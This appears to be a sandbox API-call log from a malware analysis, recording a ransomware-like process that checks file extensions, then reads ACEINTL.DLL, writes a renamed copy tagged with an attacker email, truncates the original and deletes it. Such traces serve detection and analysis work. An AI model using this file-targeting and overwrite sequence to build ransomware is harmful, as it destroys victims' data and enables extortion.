1 [0056.996] lstrlenW (lpString=".docx") returned 5 [0056.996] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0056.996] lstrlenW (lpString=".pdf") returned 4 [0056.996] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.996] lstrlenW (lpString=".xls") returned 4 [0056.996] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.996] lstrlenW (lpString=".xlsx") returned 5 [0056.996] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0056.996] lstrlenW (lpString=".ppt") returned 4 [0056.996] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.996] lstrlenW (lpString=".zip") returned 4 [0056.996] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.996] lstrlenW (lpString=".rar") returned 4 [0056.996] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.996] lstrlenW (lpString=".bz2") returned 4 [0056.996] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.996] lstrlenW (lpString=".7z") returned 3 [0056.996] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.996] lstrlenW (lpString=".dbf") returned 4 [0056.996] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.996] lstrlenW (lpString=".1cd") returned 4 [0056.996] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.996] lstrlenW (lpString=".jpg") returned 4 [0056.996] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.997] lstrlenW (lpString=".doc") returned 4 [0056.997] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.997] lstrlenW (lpString=".docx") returned 5 [0056.997] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0056.997] lstrlenW (lpString=".pdf") returned 4 [0056.997] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.997] lstrlenW (lpString=".xls") returned 4 [0056.997] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.997] lstrlenW (lpString=".xlsx") returned 5 [0056.997] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0056.997] lstrlenW (lpString=".ppt") returned 4 [0056.997] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.997] lstrlenW (lpString=".zip") returned 4 [0056.997] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.997] lstrlenW (lpString=".rar") returned 4 [0056.997] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.997] lstrlenW (lpString=".bz2") returned 4 [0056.997] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.997] lstrlenW (lpString=".7z") returned 3 [0056.997] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.997] lstrlenW (lpString=".dbf") returned 4 [0056.997] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.997] lstrlenW (lpString=".1cd") returned 4 [0056.997] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.997] lstrlenW (lpString=".jpg") returned 4 [0056.997] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.998] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0056.998] lstrlenW (lpString="TipRes.dll.mui") returned 14 [0056.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.253] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=32768) returned 1 [0057.253] CloseHandle (hObject=0x1f0) returned 1 [0057.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui")) returned 0x20 [0057.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.298] lstrlenW (lpString=".doc") returned 4 [0057.298] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0057.298] lstrlenW (lpString=".docx") returned 5 [0057.298] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0057.298] lstrlenW (lpString=".pdf") returned 4 [0057.298] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0057.298] lstrlenW (lpString=".xls") returned 4 [0057.299] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0057.299] lstrlenW (lpString=".xlsx") returned 5 [0057.299] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0057.299] lstrlenW (lpString=".ppt") returned 4 [0057.299] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0057.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.299] lstrlenW (lpString=".zip") returned 4 [0057.299] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0057.299] lstrlenW (lpString=".rar") returned 4 [0057.299] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0057.299] lstrlenW (lpString=".bz2") returned 4 [0057.299] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0057.299] lstrlenW (lpString=".7z") returned 3 [0057.299] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0057.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.299] lstrlenW (lpString=".dbf") returned 4 [0057.299] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0057.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.299] lstrlenW (lpString=".1cd") returned 4 [0057.299] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0057.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.299] lstrlenW (lpString=".jpg") returned 4 [0057.299] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0057.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.299] lstrlenW (lpString=".doc") returned 4 [0057.299] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0057.299] lstrlenW (lpString=".docx") returned 5 [0057.299] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0057.299] lstrlenW (lpString=".pdf") returned 4 [0057.300] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0057.300] lstrlenW (lpString=".xls") returned 4 [0057.300] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0057.300] lstrlenW (lpString=".xlsx") returned 5 [0057.300] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0057.300] lstrlenW (lpString=".ppt") returned 4 [0057.300] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0057.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.300] lstrlenW (lpString=".zip") returned 4 [0057.300] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0057.300] lstrlenW (lpString=".rar") returned 4 [0057.300] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0057.300] lstrlenW (lpString=".bz2") returned 4 [0057.300] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0057.300] lstrlenW (lpString=".7z") returned 3 [0057.300] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0057.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.300] lstrlenW (lpString=".dbf") returned 4 [0057.300] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0057.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.300] lstrlenW (lpString=".1cd") returned 4 [0057.300] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0057.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0057.300] lstrlenW (lpString=".jpg") returned 4 [0057.300] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0057.300] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0057.300] lstrlenW (lpString="msinfo32.exe.mui") returned 16 [0057.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0057.301] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=26624) returned 1 [0057.301] CloseHandle (hObject=0x1f8) returned 1 [0057.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0x20 [0057.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.301] lstrlenW (lpString=".doc") returned 4 [0057.301] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0057.302] lstrlenW (lpString=".docx") returned 5 [0057.302] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0057.302] lstrlenW (lpString=".pdf") returned 4 [0057.302] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0057.302] lstrlenW (lpString=".xls") returned 4 [0057.302] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0057.302] lstrlenW (lpString=".xlsx") returned 5 [0057.302] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0057.302] lstrlenW (lpString=".ppt") returned 4 [0057.302] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.302] lstrlenW (lpString=".zip") returned 4 [0057.302] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0057.302] lstrlenW (lpString=".rar") returned 4 [0057.302] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0057.302] lstrlenW (lpString=".bz2") returned 4 [0057.302] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0057.302] lstrlenW (lpString=".7z") returned 3 [0057.302] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.302] lstrlenW (lpString=".dbf") returned 4 [0057.302] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.302] lstrlenW (lpString=".1cd") returned 4 [0057.302] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.302] lstrlenW (lpString=".jpg") returned 4 [0057.302] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.303] lstrlenW (lpString=".doc") returned 4 [0057.303] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0057.303] lstrlenW (lpString=".docx") returned 5 [0057.303] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0057.303] lstrlenW (lpString=".pdf") returned 4 [0057.303] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0057.303] lstrlenW (lpString=".xls") returned 4 [0057.303] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0057.303] lstrlenW (lpString=".xlsx") returned 5 [0057.303] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0057.303] lstrlenW (lpString=".ppt") returned 4 [0057.303] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0057.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.303] lstrlenW (lpString=".zip") returned 4 [0057.303] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0057.303] lstrlenW (lpString=".rar") returned 4 [0057.303] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0057.303] lstrlenW (lpString=".bz2") returned 4 [0057.303] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0057.303] lstrlenW (lpString=".7z") returned 3 [0057.303] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0057.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.303] lstrlenW (lpString=".dbf") returned 4 [0057.303] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0057.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.303] lstrlenW (lpString=".1cd") returned 4 [0057.303] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0057.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0057.303] lstrlenW (lpString=".jpg") returned 4 [0057.303] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0057.304] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0057.304] lstrlenW (lpString="msinfo32.exe") returned 12 [0057.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0057.304] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=378880) returned 1 [0057.304] CloseHandle (hObject=0x1f8) returned 1 [0057.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe")) returned 0x20 [0057.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.304] lstrlenW (lpString=".doc") returned 4 [0057.305] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0057.305] lstrlenW (lpString=".docx") returned 5 [0057.305] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0057.305] lstrlenW (lpString=".pdf") returned 4 [0057.305] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0057.305] lstrlenW (lpString=".xls") returned 4 [0057.305] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0057.305] lstrlenW (lpString=".xlsx") returned 5 [0057.305] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0057.305] lstrlenW (lpString=".ppt") returned 4 [0057.305] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0057.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.305] lstrlenW (lpString=".zip") returned 4 [0057.305] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0057.305] lstrlenW (lpString=".rar") returned 4 [0057.305] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0057.305] lstrlenW (lpString=".bz2") returned 4 [0057.305] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0057.305] lstrlenW (lpString=".7z") returned 3 [0057.305] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0057.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.305] lstrlenW (lpString=".dbf") returned 4 [0057.305] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0057.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.305] lstrlenW (lpString=".1cd") returned 4 [0057.305] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0057.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.305] lstrlenW (lpString=".jpg") returned 4 [0057.305] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0057.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.306] lstrlenW (lpString=".doc") returned 4 [0057.306] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0057.306] lstrlenW (lpString=".docx") returned 5 [0057.306] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0057.306] lstrlenW (lpString=".pdf") returned 4 [0057.306] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0057.306] lstrlenW (lpString=".xls") returned 4 [0057.306] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0057.306] lstrlenW (lpString=".xlsx") returned 5 [0057.306] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0057.306] lstrlenW (lpString=".ppt") returned 4 [0057.306] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0057.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.306] lstrlenW (lpString=".zip") returned 4 [0057.306] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0057.306] lstrlenW (lpString=".rar") returned 4 [0057.306] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0057.306] lstrlenW (lpString=".bz2") returned 4 [0057.306] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0057.306] lstrlenW (lpString=".7z") returned 3 [0057.306] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0057.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.306] lstrlenW (lpString=".dbf") returned 4 [0057.306] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0057.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.306] lstrlenW (lpString=".1cd") returned 4 [0057.306] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0057.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0057.306] lstrlenW (lpString=".jpg") returned 4 [0057.306] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0057.307] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0057.307] lstrlenW (lpString="ACEINTL.DLL") returned 11 [0057.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.792] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=198056) returned 1 [0057.792] CloseHandle (hObject=0x1f0) returned 1 [0057.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 0x20 [0057.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.807] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.807] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0057.808] GetLastError () returned 0x0 [0057.808] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x305a8, lpOverlapped=0x0) returned 1 [0057.827] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x305b0, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x305b0, lpOverlapped=0x0) returned 1 [0057.831] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.831] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xea, lpOverlapped=0x0) returned 1 [0057.831] SetEndOfFile (hFile=0x220) returned 1 [0057.831] CloseHandle (hObject=0x220) returned 1 [0057.831] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.831] SetEndOfFile (hFile=0x1f0) returned 1 [0057.833] CloseHandle (hObject=0x1f0) returned 1 [0057.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.833] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 1 [0057.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.833] 